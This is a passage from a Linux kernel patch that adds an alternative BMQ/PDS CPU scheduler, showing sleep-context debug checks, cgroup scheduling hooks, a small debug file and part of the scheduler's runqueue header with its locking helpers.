++			"state=%x set at [<%p>] %pS\n", state,
++			(void *)current->task_state_change,
++			(void *)current->task_state_change);
++
++	__might_resched(file, line, 0);
++}
++EXPORT_SYMBOL(__might_sleep);
++
++static void print_preempt_disable_ip(int preempt_offset, unsigned long ip)
++{
++	if (!IS_ENABLED(CONFIG_DEBUG_PREEMPT))
++		return;
++
++	if (preempt_count() == preempt_offset)
++		return;
++
++	pr_err("Preemption disabled at:");
++	print_ip_sym(KERN_ERR, ip);
++}
++
++static inline bool resched_offsets_ok(unsigned int offsets)
++{
++	unsigned int nested = preempt_count();
++
++	nested += rcu_preempt_depth() << MIGHT_RESCHED_RCU_SHIFT;
++
++	return nested == offsets;
++}
++
++void __might_resched(const char *file, int line, unsigned int offsets)
++{
++	/* Ratelimiting timestamp: */
++	static unsigned long prev_jiffy;
++
++	unsigned long preempt_disable_ip;
++
++	/* WARN_ON_ONCE() by default, no rate limit required: */
++	rcu_sleep_check();
++
++	if ((resched_offsets_ok(offsets) && !irqs_disabled() &&
++	     !is_idle_task(current) && !current->non_block_count) ||
++	    system_state == SYSTEM_BOOTING || system_state > SYSTEM_RUNNING ||
++	    oops_in_progress)
++		return;
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	/* Save this before calling printk(), since that will clobber it: */
++	preempt_disable_ip = get_preempt_disable_ip(current);
++
++	pr_err("BUG: sleeping function called from invalid context at %s:%d\n",
++	       file, line);
++	pr_err("in_atomic(): %d, irqs_disabled(): %d, non_block: %d, pid: %d, name: %s\n",
++	       in_atomic(), irqs_disabled(), current->non_block_count,
++	       current->pid, current->comm);
++	pr_err("preempt_count: %x, expected: %x\n", preempt_count(),
++	       offsets & MIGHT_RESCHED_PREEMPT_MASK);
++
++	if (IS_ENABLED(CONFIG_PREEMPT_RCU)) {
++		pr_err("RCU nest depth: %d, expected: %u\n",
++		       rcu_preempt_depth(), offsets >> MIGHT_RESCHED_RCU_SHIFT);
++	}
++
++	if (task_stack_end_corrupted(current))
++		pr_emerg("Thread overran stack, or stack corrupted\n");
++
++	debug_show_held_locks(current);
++	if (irqs_disabled())
++		print_irqtrace_events(current);
++
++	print_preempt_disable_ip(offsets & MIGHT_RESCHED_PREEMPT_MASK,
++				 preempt_disable_ip);
++
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL(__might_resched);
++
++void __cant_sleep(const char *file, int line, int preempt_offset)
++{
++	static unsigned long prev_jiffy;
++
++	if (irqs_disabled())
++		return;
++
++	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
++		return;
++
++	if (preempt_count() > preempt_offset)
++		return;
++
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	printk(KERN_ERR "BUG: assuming atomic context at %s:%d\n", file, line);
++	printk(KERN_ERR "in_atomic(): %d, irqs_disabled(): %d, pid: %d, name: %s\n",
++			in_atomic(), irqs_disabled(),
++			current->pid, current->comm);
++
++	debug_show_held_locks(current);
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL_GPL(__cant_sleep);
++
++#ifdef CONFIG_SMP
++void __cant_migrate(const char *file, int line)
++{
++	static unsigned long prev_jiffy;
++
++	if (irqs_disabled())
++		return;
++
++	if (is_migration_disabled(current))
++		return;
++
++	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
++		return;
++
++	if (preempt_count() > 0)
++		return;
++
++	if (current->migration_flags & MDF_FORCE_ENABLED)
++		return;
++
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	pr_err("BUG: assuming non migratable context at %s:%d\n", file, line);
++	pr_err("in_atomic(): %d, irqs_disabled(): %d, migration_disabled() %u pid: %d, name: %s\n",
++	       in_atomic(), irqs_disabled(), is_migration_disabled(current),
++	       current->pid, current->comm);
++
++	debug_show_held_locks(current);
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL_GPL(__cant_migrate);
++#endif
++#endif
++
++#ifdef CONFIG_MAGIC_SYSRQ
++void normalize_rt_tasks(void)
++{
++	struct task_struct *g, *p;
++	struct sched_attr attr = {
++		.sched_policy = SCHED_NORMAL,
++	};
++
++	read_lock(&tasklist_lock);
++	for_each_process_thread(g, p) {
++		/*
++		 * Only normalize user tasks:
++		 */
++		if (p->flags & PF_KTHREAD)
++			continue;
++
++		schedstat_set(p->stats.wait_start,  0);
++		schedstat_set(p->stats.sleep_start, 0);
++		schedstat_set(p->stats.block_start, 0);
++
++		if (!rt_task(p)) {
++			/*
++			 * Renice negative nice level userspace
++			 * tasks back to 0:
++			 */
++			if (task_nice(p) < 0)
++				set_user_nice(p, 0);
++			continue;
++		}
++
++		__sched_setscheduler(p, &attr, false, false);
++	}
++	read_unlock(&tasklist_lock);
++}
++#endif /* CONFIG_MAGIC_SYSRQ */
++
++#if defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB)
++/*
++ * These functions are only useful for the IA64 MCA handling, or kdb.
++ *
++ * They can only be called when the whole system has been
++ * stopped - every CPU needs to be quiescent, and no scheduling
++ * activity can take place. Using them for anything else would
++ * be a serious bug, and as a result, they aren't even visible
++ * under any other configuration.
++ */
++
++/**
++ * curr_task - return the current task for a given CPU.
++ * @cpu: the processor in question.
++ *
++ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
++ *
++ * Return: The current task for @cpu.
++ */
++struct task_struct *curr_task(int cpu)
++{
++	return cpu_curr(cpu);
++}
++
++#endif /* defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB) */
++
++#ifdef CONFIG_IA64
++/**
++ * ia64_set_curr_task - set the current task for a given CPU.
++ * @cpu: the processor in question.
++ * @p: the task pointer to set.
++ *
++ * Description: This function must only be used when non-maskable interrupts
++ * are serviced on a separate stack.  It allows the architecture to switch the
++ * notion of the current task on a CPU in a non-blocking manner.  This function
++ * must be called with all CPU's synchronised, and interrupts disabled, the
++ * and caller must save the original value of the current task (see
++ * curr_task() above) and restore that value before reenabling interrupts and
++ * re-starting the system.
++ *
++ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
++ */
++void ia64_set_curr_task(int cpu, struct task_struct *p)
++{
++	cpu_curr(cpu) = p;
++}
++
++#endif
++
++#ifdef CONFIG_CGROUP_SCHED
++static void sched_free_group(struct task_group *tg)
++{
++	kmem_cache_free(task_group_cache, tg);
++}
++
++static void sched_free_group_rcu(struct rcu_head *rhp)
++{
++	sched_free_group(container_of(rhp, struct task_group, rcu));
++}
++
++static void sched_unregister_group(struct task_group *tg)
++{
++	/*
++	 * We have to wait for yet another RCU grace period to expire, as
++	 * print_cfs_stats() might run concurrently.
++	 */
++	call_rcu(&tg->rcu, sched_free_group_rcu);
++}
++
++/* allocate runqueue etc for a new task group */
++struct task_group *sched_create_group(struct task_group *parent)
++{
++	struct task_group *tg;
++
++	tg = kmem_cache_alloc(task_group_cache, GFP_KERNEL | __GFP_ZERO);
++	if (!tg)
++		return ERR_PTR(-ENOMEM);
++
++	return tg;
++}
++
++void sched_online_group(struct task_group *tg, struct task_group *parent)
++{
++}
++
++/* rcu callback to free various structures associated with a task group */
++static void sched_unregister_group_rcu(struct rcu_head *rhp)
++{
++	/* Now it should be safe to free those cfs_rqs: */
++	sched_unregister_group(container_of(rhp, struct task_group, rcu));
++}
++
++void sched_destroy_group(struct task_group *tg)
++{
++	/* Wait for possible concurrent references to cfs_rqs complete: */
++	call_rcu(&tg->rcu, sched_unregister_group_rcu);
++}
++
++void sched_release_group(struct task_group *tg)
++{
++}
++
++static inline struct task_group *css_tg(struct cgroup_subsys_state *css)
++{
++	return css ? container_of(css, struct task_group, css) : NULL;
++}
++
++static struct cgroup_subsys_state *
++cpu_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
++{
++	struct task_group *parent = css_tg(parent_css);
++	struct task_group *tg;
++
++	if (!parent) {
++		/* This is early initialization for the top cgroup */
++		return &root_task_group.css;
++	}
++
++	tg = sched_create_group(parent);
++	if (IS_ERR(tg))
++		return ERR_PTR(-ENOMEM);
++	return &tg->css;
++}
++
++/* Expose task group only after completing cgroup initialization */
++static int cpu_cgroup_css_online(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++	struct task_group *parent = css_tg(css->parent);
++
++	if (parent)
++		sched_online_group(tg, parent);
++	return 0;
++}
++
++static void cpu_cgroup_css_released(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++
++	sched_release_group(tg);
++}
++
++static void cpu_cgroup_css_free(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++
++	/*
++	 * Relies on the RCU grace period between css_released() and this.
++	 */
++	sched_unregister_group(tg);
++}
++
++#ifdef CONFIG_RT_GROUP_SCHED
++static int cpu_cgroup_can_attach(struct cgroup_taskset *tset)
++{
++	return 0;
++}
++#endif
++
++static void cpu_cgroup_attach(struct cgroup_taskset *tset)
++{
++}
++
++#ifdef CONFIG_FAIR_GROUP_SCHED
++static DEFINE_MUTEX(shares_mutex);
++
++int sched_group_set_shares(struct task_group *tg, unsigned long shares)
++{
++	/*
++	 * We can't change the weight of the root cgroup.
++	 */
++	if (&root_task_group == tg)
++		return -EINVAL;
++
++	shares = clamp(shares, scale_load(MIN_SHARES), scale_load(MAX_SHARES));
++
++	mutex_lock(&shares_mutex);
++	if (tg->shares == shares)
++		goto done;
++
++	tg->shares = shares;
++done:
++	mutex_unlock(&shares_mutex);
++	return 0;
++}
++
++static int cpu_shares_write_u64(struct cgroup_subsys_state *css,
++				struct cftype *cftype, u64 shareval)
++{
++	if (shareval > scale_load_down(ULONG_MAX))
++		shareval = MAX_SHARES;
++	return sched_group_set_shares(css_tg(css), scale_load(shareval));
++}
++
++static u64 cpu_shares_read_u64(struct cgroup_subsys_state *css,
++			       struct cftype *cft)
++{
++	struct task_group *tg = css_tg(css);
++
++	return (u64) scale_load_down(tg->shares);
++}
++#endif
++
++static struct cftype cpu_legacy_files[] = {
++#ifdef CONFIG_FAIR_GROUP_SCHED
++	{
++		.name = "shares",
++		.read_u64 = cpu_shares_read_u64,
++		.write_u64 = cpu_shares_write_u64,
++	},
++#endif
++	{ }	/* Terminate */
++};
++
++
++static struct cftype cpu_files[] = {
++	{ }	/* terminate */
++};
++
++static int cpu_extra_stat_show(struct seq_file *sf,
++			       struct cgroup_subsys_state *css)
++{
++	return 0;
++}
++
++struct cgroup_subsys cpu_cgrp_subsys = {
++	.css_alloc	= cpu_cgroup_css_alloc,
++	.css_online	= cpu_cgroup_css_online,
++	.css_released	= cpu_cgroup_css_released,
++	.css_free	= cpu_cgroup_css_free,
++	.css_extra_stat_show = cpu_extra_stat_show,
++#ifdef CONFIG_RT_GROUP_SCHED
++	.can_attach	= cpu_cgroup_can_attach,
++#endif
++	.attach		= cpu_cgroup_attach,
++	.legacy_cftypes	= cpu_files,
++	.legacy_cftypes	= cpu_legacy_files,
++	.dfl_cftypes	= cpu_files,
++	.early_init	= true,
++	.threaded	= true,
++};
++#endif	/* CONFIG_CGROUP_SCHED */
++
++#undef CREATE_TRACE_POINTS
+diff --git a/kernel/sched/alt_debug.c b/kernel/sched/alt_debug.c
+new file mode 100644
+index 000000000000..1212a031700e
+--- /dev/null
++++ b/kernel/sched/alt_debug.c
+@@ -0,0 +1,31 @@
++/*
++ * kernel/sched/alt_debug.c
++ *
++ * Print the alt scheduler debugging details
++ *
++ * Author: Alfred Chen
++ * Date  : 2020
++ */
++#include "sched.h"
++
++/*
++ * This allows printing both to /proc/sched_debug and
++ * to the console
++ */
++#define SEQ_printf(m, x...)			\
++ do {						\
++	if (m)					\
++		seq_printf(m, x);		\
++	else					\
++		pr_cont(x);			\
++ } while (0)
++
++void proc_sched_show_task(struct task_struct *p, struct pid_namespace *ns,
++			  struct seq_file *m)
++{
++	SEQ_printf(m, "%s (%d, #threads: %d)\n", p->comm, task_pid_nr_ns(p, ns),
++						get_nr_threads(p));
++}
++
++void proc_sched_set_task(struct task_struct *p)
++{}
+diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
+new file mode 100644
+index 000000000000..e3b6320a397a
+--- /dev/null
++++ b/kernel/sched/alt_sched.h
+@@ -0,0 +1,667 @@
++#ifndef ALT_SCHED_H
++#define ALT_SCHED_H
++
++#include <linux/context_tracking.h>
++#include <linux/psi.h>
++#include <linux/stop_machine.h>
++#include <linux/syscalls.h>
++#include <linux/tick.h>
++
++#include <trace/events/power.h>
++#include <trace/events/sched.h>
++
++#include "../workqueue_internal.h"
++
++#include "cpupri.h"
++
++#ifdef CONFIG_SCHED_BMQ
++/* bits:
++ * RT(0-99), (Low prio adj range, nice width, high prio adj range) / 2, cpu idle task */
++#define SCHED_BITS	(MAX_RT_PRIO + NICE_WIDTH / 2 + MAX_PRIORITY_ADJ + 1)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++/* bits: RT(0-99), reserved(100-127), NORMAL_PRIO_NUM, cpu idle task */
++#define SCHED_BITS	(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM + 1)
++#endif /* CONFIG_SCHED_PDS */
++
++#define IDLE_TASK_SCHED_PRIO	(SCHED_BITS - 1)
++
++#ifdef CONFIG_SCHED_DEBUG
++# define SCHED_WARN_ON(x)	WARN_ONCE(x, #x)
++extern void resched_latency_warn(int cpu, u64 latency);
++#else
++# define SCHED_WARN_ON(x)	({ (void)(x), 0; })
++static inline void resched_latency_warn(int cpu, u64 latency) {}
++#endif
++
++/*
++ * Increase resolution of nice-level calculations for 64-bit architectures.
++ * The extra resolution improves shares distribution and load balancing of
++ * low-weight task groups (eg. nice +19 on an autogroup), deeper taskgroup
++ * hierarchies, especially on larger systems. This is not a user-visible change
++ * and does not change the user-interface for setting shares/weights.
++ *
++ * We increase resolution only if we have enough bits to allow this increased
++ * resolution (i.e. 64-bit). The costs for increasing resolution when 32-bit
++ * are pretty high and the returns do not justify the increased costs.
++ *
++ * Really only required when CONFIG_FAIR_GROUP_SCHED=y is also set, but to
++ * increase coverage and consistency always enable it on 64-bit platforms.
++ */
++#ifdef CONFIG_64BIT
++# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT + SCHED_FIXEDPOINT_SHIFT)
++# define scale_load(w)		((w) << SCHED_FIXEDPOINT_SHIFT)
++# define scale_load_down(w) \
++({ \
++	unsigned long __w = (w); \
++	if (__w) \
++		__w = max(2UL, __w >> SCHED_FIXEDPOINT_SHIFT); \
++	__w; \
++})
++#else
++# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT)
++# define scale_load(w)		(w)
++# define scale_load_down(w)	(w)
++#endif
++
++#ifdef CONFIG_FAIR_GROUP_SCHED
++#define ROOT_TASK_GROUP_LOAD	NICE_0_LOAD
++
++/*
++ * A weight of 0 or 1 can cause arithmetics problems.
++ * A weight of a cfs_rq is the sum of weights of which entities
++ * are queued on this cfs_rq, so a weight of a entity should not be
++ * too large, so as the shares value of a task group.
++ * (The default weight is 1024 - so there's no practical
++ *  limitation from this.)
++ */
++#define MIN_SHARES		(1UL <<  1)
++#define MAX_SHARES		(1UL << 18)
++#endif
++
++/*
++ * Tunables that become constants when CONFIG_SCHED_DEBUG is off:
++ */
++#ifdef CONFIG_SCHED_DEBUG
++# define const_debug __read_mostly
++#else
++# define const_debug const
++#endif
++
++/* task_struct::on_rq states: */
++#define TASK_ON_RQ_QUEUED	1
++#define TASK_ON_RQ_MIGRATING	2
++
++static inline int task_on_rq_queued(struct task_struct *p)
++{
++	return p->on_rq == TASK_ON_RQ_QUEUED;
++}
++
++static inline int task_on_rq_migrating(struct task_struct *p)
++{
++	return READ_ONCE(p->on_rq) == TASK_ON_RQ_MIGRATING;
++}
++
++/*
++ * wake flags
++ */
++#define WF_SYNC		0x01		/* waker goes to sleep after wakeup */
++#define WF_FORK		0x02		/* child wakeup after fork */
++#define WF_MIGRATED	0x04		/* internal use, task got migrated */
++
++#define SCHED_QUEUE_BITS	(SCHED_BITS - 1)
++
++struct sched_queue {
++	DECLARE_BITMAP(bitmap, SCHED_QUEUE_BITS);
++	struct list_head heads[SCHED_BITS];
++};
++
++struct rq;
++struct balance_callback {
++	struct balance_callback *next;
++	void (*func)(struct rq *rq);
++};
++
++/*
++ * This is the main, per-CPU runqueue data structure.
++ * This data should only be modified by the local cpu.
++ */
++struct rq {
++	/* runqueue lock: */
++	raw_spinlock_t lock;
++
++	struct task_struct __rcu *curr;
++	struct task_struct *idle, *stop, *skip;
++	struct mm_struct *prev_mm;
++
++	struct sched_queue	queue;
++#ifdef CONFIG_SCHED_PDS
++	u64			time_edge;
++#endif
++	unsigned long prio;
++
++	/* switch count */
++	u64 nr_switches;
++
++	atomic_t nr_iowait;
++
++#ifdef CONFIG_SCHED_DEBUG
++	u64 last_seen_need_resched_ns;
++	int ticks_without_resched;
++#endif
++
++#ifdef CONFIG_MEMBARRIER
++	int membarrier_state;
++#endif
++
++#ifdef CONFIG_SMP
++	int cpu;		/* cpu of this runqueue */
++	bool online;
++
++	unsigned int		ttwu_pending;
++	unsigned char		nohz_idle_balance;
++	unsigned char		idle_balance;
++
++#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
++	struct sched_avg	avg_irq;
++#endif
++
++#ifdef CONFIG_SCHED_SMT
++	int active_balance;
++	struct cpu_stop_work	active_balance_work;
++#endif
++	struct balance_callback	*balance_callback;
++#ifdef CONFIG_HOTPLUG_CPU
++	struct rcuwait		hotplug_wait;
++#endif
++	unsigned int		nr_pinned;
++
++#endif /* CONFIG_SMP */
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++	u64 prev_irq_time;
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
++#ifdef CONFIG_PARAVIRT
++	u64 prev_steal_time;
++#endif /* CONFIG_PARAVIRT */
++#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
++	u64 prev_steal_time_rq;
++#endif /* CONFIG_PARAVIRT_TIME_ACCOUNTING */
++
++	/* For genenal cpu load util */
++	s32 load_history;
++	u64 load_block;
++	u64 load_stamp;
++
++	/* calc_load related fields */
++	unsigned long calc_load_update;
++	long calc_load_active;
++
++	u64 clock, last_tick;
++	u64 last_ts_switch;
++	u64 clock_task;
++
++	unsigned int  nr_running;
++	unsigned long nr_uninterruptible;
++
++#ifdef CONFIG_SCHED_HRTICK
++#ifdef CONFIG_SMP
++	call_single_data_t hrtick_csd;
++#endif
++	struct hrtimer		hrtick_timer;
++	ktime_t			hrtick_time;
++#endif
++
++#ifdef CONFIG_SCHEDSTATS
++
++	/* latency stats */
++	struct sched_info rq_sched_info;
++	unsigned long long rq_cpu_time;
++	/* could above be rq->cfs_rq.exec_clock + rq->rt_rq.rt_runtime ? */
++
++	/* sys_sched_yield() stats */
++	unsigned int yld_count;
++
++	/* schedule() stats */
++	unsigned int sched_switch;
++	unsigned int sched_count;
++	unsigned int sched_goidle;
++
++	/* try_to_wake_up() stats */
++	unsigned int ttwu_count;
++	unsigned int ttwu_local;
++#endif /* CONFIG_SCHEDSTATS */
++
++#ifdef CONFIG_CPU_IDLE
++	/* Must be inspected within a rcu lock section */
++	struct cpuidle_state *idle_state;
++#endif
++
++#ifdef CONFIG_NO_HZ_COMMON
++#ifdef CONFIG_SMP
++	call_single_data_t	nohz_csd;
++#endif
++	atomic_t		nohz_flags;
++#endif /* CONFIG_NO_HZ_COMMON */
++};
++
++extern unsigned long rq_load_util(struct rq *rq, unsigned long max);
++
++extern unsigned long calc_load_update;
++extern atomic_long_t calc_load_tasks;
++
++extern void calc_global_load_tick(struct rq *this_rq);
++extern long calc_load_fold_active(struct rq *this_rq, long adjust);
++
++DECLARE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
++#define cpu_rq(cpu)		(&per_cpu(runqueues, (cpu)))
++#define this_rq()		this_cpu_ptr(&runqueues)
++#define task_rq(p)		cpu_rq(task_cpu(p))
++#define cpu_curr(cpu)		(cpu_rq(cpu)->curr)
++#define raw_rq()		raw_cpu_ptr(&runqueues)
++
++#ifdef CONFIG_SMP
++#if defined(CONFIG_SCHED_DEBUG) && defined(CONFIG_SYSCTL)
++void register_sched_domain_sysctl(void);
++void unregister_sched_domain_sysctl(void);
++#else
++static inline void register_sched_domain_sysctl(void)
++{
++}
++static inline void unregister_sched_domain_sysctl(void)
++{
++}
++#endif
++
++extern bool sched_smp_initialized;
++
++enum {
++	ITSELF_LEVEL_SPACE_HOLDER,
++#ifdef CONFIG_SCHED_SMT
++	SMT_LEVEL_SPACE_HOLDER,
++#endif
++	COREGROUP_LEVEL_SPACE_HOLDER,
++	CORE_LEVEL_SPACE_HOLDER,
++	OTHER_LEVEL_SPACE_HOLDER,
++	NR_CPU_AFFINITY_LEVELS
++};
++
++DECLARE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
++DECLARE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
++
++static inline int
++__best_mask_cpu(const cpumask_t *cpumask, const cpumask_t *mask)
++{
++	int cpu;
++
++	while ((cpu = cpumask_any_and(cpumask, mask)) >= nr_cpu_ids)
++		mask++;
++
++	return cpu;
++}
++
++static inline int best_mask_cpu(int cpu, const cpumask_t *mask)
++{
++	return __best_mask_cpu(mask, per_cpu(sched_cpu_topo_masks, cpu));
++}
++
++extern void flush_smp_call_function_queue(void);
++
++#else  /* !CONFIG_SMP */
++static inline void flush_smp_call_function_queue(void) { }
++#endif
++
++#ifndef arch_scale_freq_tick
++static __always_inline
++void arch_scale_freq_tick(void)
++{
++}
++#endif
++
++#ifndef arch_scale_freq_capacity
++static __always_inline
++unsigned long arch_scale_freq_capacity(int cpu)
++{
++	return SCHED_CAPACITY_SCALE;
++}
++#endif
++
++static inline u64 __rq_clock_broken(struct rq *rq)
++{
++	return READ_ONCE(rq->clock);
++}
++
++static inline u64 rq_clock(struct rq *rq)
++{
++	/*
++	 * Relax lockdep_assert_held() checking as in VRQ, call to
++	 * sched_info_xxxx() may not held rq->lock
++	 * lockdep_assert_held(&rq->lock);
++	 */
++	return rq->clock;
++}
++
++static inline u64 rq_clock_task(struct rq *rq)
++{
++	/*
++	 * Relax lockdep_assert_held() checking as in VRQ, call to
++	 * sched_info_xxxx() may not held rq->lock
++	 * lockdep_assert_held(&rq->lock);
++	 */
++	return rq->clock_task;
++}
++
++/*
++ * {de,en}queue flags:
++ *
++ * DEQUEUE_SLEEP  - task is no longer runnable
++ * ENQUEUE_WAKEUP - task just became runnable
++ *
++ */
++
++#define DEQUEUE_SLEEP		0x01
++
++#define ENQUEUE_WAKEUP		0x01
++
++
++/*
++ * Below are scheduler API which using in other kernel code
++ * It use the dummy rq_flags
++ * ToDo : BMQ need to support these APIs for compatibility with mainline
++ * scheduler code.
++ */
++struct rq_flags {
++	unsigned long flags;
++};
++
++struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(rq->lock);
++
++struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(p->pi_lock)
++	__acquires(rq->lock);
++
++static inline void __task_rq_unlock(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock(&rq->lock);
++}
++
++static inline void
++task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
++	__releases(rq->lock)
++	__releases(p->pi_lock)
++{
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
++}
++
++static inline void
++rq_lock(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock(&rq->lock);
++}
++
++static inline void
++rq_unlock(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock(&rq->lock);
++}
++
++static inline void
++rq_lock_irq(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irq(&rq->lock);
++}
++
++static inline void
++rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock_irq(&rq->lock);
++}
++
++static inline struct rq *
++this_rq_lock_irq(struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	local_irq_disable();
++	rq = this_rq();
++	raw_spin_lock(&rq->lock);
++
++	return rq;
++}
++
++static inline raw_spinlock_t *__rq_lockp(struct rq *rq)
++{
++	return &rq->lock;
++}
++
++static inline raw_spinlock_t *rq_lockp(struct rq *rq)
++{
++	return __rq_lockp(rq);
++}
++
++static inline void lockdep_assert_rq_held(struct rq *rq)
++{
++	lockdep_assert_held(__rq_lockp(rq));
++}
++
++extern void raw_spin_rq_lock_nested(struct rq *rq, int subclass);
++extern void raw_spin_rq_unlock(struct rq *rq);
++
++static inline void raw_spin_rq_lock(struct rq *rq)
++{
++	raw_spin_rq_lock_nested(rq, 0);
++}
++
++static inline void raw_spin_rq_lock_irq(struct rq *rq)
++{
++	local_irq_disable();
++	raw_spin_rq_lock(rq);
++}
++
++static inline void raw_spin_rq_unlock_irq(struct rq *rq)
++{
++	raw_spin_rq_unlock(rq);
++	local_irq_enable();
++}
++
++static inline int task_current(struct rq *rq, struct task_struct *p)
++{
++	return rq->curr == p;
++}
++
++static inline bool task_on_cpu(struct task_struct *p)
++{
++	return p->on_cpu;
++}
++
++extern int task_running_nice(struct task_struct *p);
++
++extern struct static_key_false sched_schedstats;
++
++#ifdef CONFIG_CPU_IDLE
++static inline void idle_set_state(struct rq *rq,
++				  struct cpuidle_state *idle_state)
++{
++	rq->idle_state = idle_state;
++}
++
++static inline struct cpuidle_state *idle_get_state(struct rq *rq)
++{
++	WARN_ON(!rcu_read_lock_held());
++	return rq->idle_state;
++}
++#else
++static inline void idle_set_state(struct rq *rq,
++				  struct cpuidle_state *idle_state)
++{
++}
++
++static inline struct cpuidle_state *idle_get_state(struct rq *rq)
++{
++	return NULL;
++}
++#endif
++
++static inline int cpu_of(const struct rq *rq)
++{
++#ifdef CONFIG_SMP
++	return rq->cpu;
++#else
++	return 0;
++#endif
++}
++
++#include "stats.h"
++
++#ifdef CONFIG_NO_HZ_COMMON
++#define NOHZ_BALANCE_KICK_BIT	0
++#define NOHZ_STATS_KICK_BIT	1
++
++#define NOHZ_BALANCE_KICK	BIT(NOHZ_BALANCE_KICK_BIT)
++#define NOHZ_STATS_KICK		BIT(NOHZ_STATS_KICK_BIT)
++
++#define NOHZ_KICK_MASK	(NOHZ_BALANCE_KICK | NOHZ_STATS_KICK)
++
++#define nohz_flags(cpu)	(&cpu_rq(cpu)->nohz_flags)
++
++/* TODO: needed?
++extern void nohz_balance_exit_idle(struct rq *rq);
++#else
++static inline void nohz_balance_exit_idle(struct rq *rq) { }
++*/
++#endif
++
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++struct irqtime {
++	u64			total;
++	u64			tick_delta;
++	u64			irq_start_time;
++	struct u64_stats_sync	sync;
++};
++
++DECLARE_PER_CPU(struct irqtime, cpu_irqtime);
++
++/*
++ * Returns the irqtime minus the softirq time computed by ksoftirqd.
++ * Otherwise ksoftirqd's sum_exec_runtime is substracted its own runtime
++ * and never move forward.
++ */
++static inline u64 irq_time_read(int cpu)
++{
++	struct irqtime *irqtime = &per_cpu(cpu_irqtime, cpu);
++	unsigned int seq;
++	u64 total;
++
++	do {
++		seq = __u64_stats_fetch_begin(&irqtime->sync);
++		total = irqtime->total;
++	} while (__u64_stats_fetch_retry(&irqtime->sync, seq));
++
++	return total;
++}
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
++
++#ifdef CONFIG_CPU_FREQ
++DECLARE_PER_CPU(struct update_util_data __rcu *, cpufreq_update_util_data);
++#endif /* CONFIG_CPU_FREQ */
++
++#ifdef CONFIG_NO_HZ_FULL
++extern int __init sched_tick_offload_init(void);
++#else
++static inline int sched_tick_offload_init(void) { return 0; }
++#endif
++
++#ifdef arch_scale_freq_capacity
++#ifndef arch_scale_freq_invariant
++#define arch_scale_freq_invariant()	(true)
++#endif
++#else /* arch_scale_freq_capacity */
++#define arch_scale_freq_invariant()	(false)
++#endif
++
++extern void schedule_idle(void);
++
++#define cap_scale(v, s) ((v)*(s) >> SCHED_CAPACITY_SHIFT)
++
++/*
++ * !! For sched_setattr_nocheck() (kernel) only !!
++ *
++ * This is actually gross. :(
++ *
++ * It is used to make schedutil kworker(s) higher priority than SCHED_DEADLINE
++ * tasks, but still be able to sleep. We need this on platforms that cannot
++ * atomically change clock frequency. Remove once fast switching will be
++ * available on such platforms.
++ *
++ * SUGOV stands for SchedUtil GOVernor.
++ */
++#define SCHED_FLAG_SUGOV	0x10000000
++
++#ifdef CONFIG_MEMBARRIER
++/*
++ * The scheduler provides memory barriers required by membarrier between:
++ * - prior user-space memory accesses and store to rq->membarrier_state,
++ * - store to rq->membarrier_state and following user-space memory accesses.
++ * In the same way it provides those guarantees around store to rq->curr.
++ */
++static inline void membarrier_switch_mm(struct rq *rq,
++					struct mm_struct *prev_mm,
++					struct mm_struct *next_mm)
++{
++	int membarrier_state;
++
++	if (prev_mm == next_mm)
++		return;
++
++	membarrier_state = atomic_read(&next_mm->membarrier_state);
++	if (READ_ONCE(rq->membarrier_state) == membarrier_state)
++		return;
++
++	WRITE_ONCE(rq->membarrier_state, membarrier_state);
++}
++#else
++static inline void membarrier_switch_mm(struct rq *rq,
++					struct mm_struct *prev_mm,
++					struct mm_struct *next_mm)
++{
++}
++#endif
++
++#ifdef CONFIG_NUMA
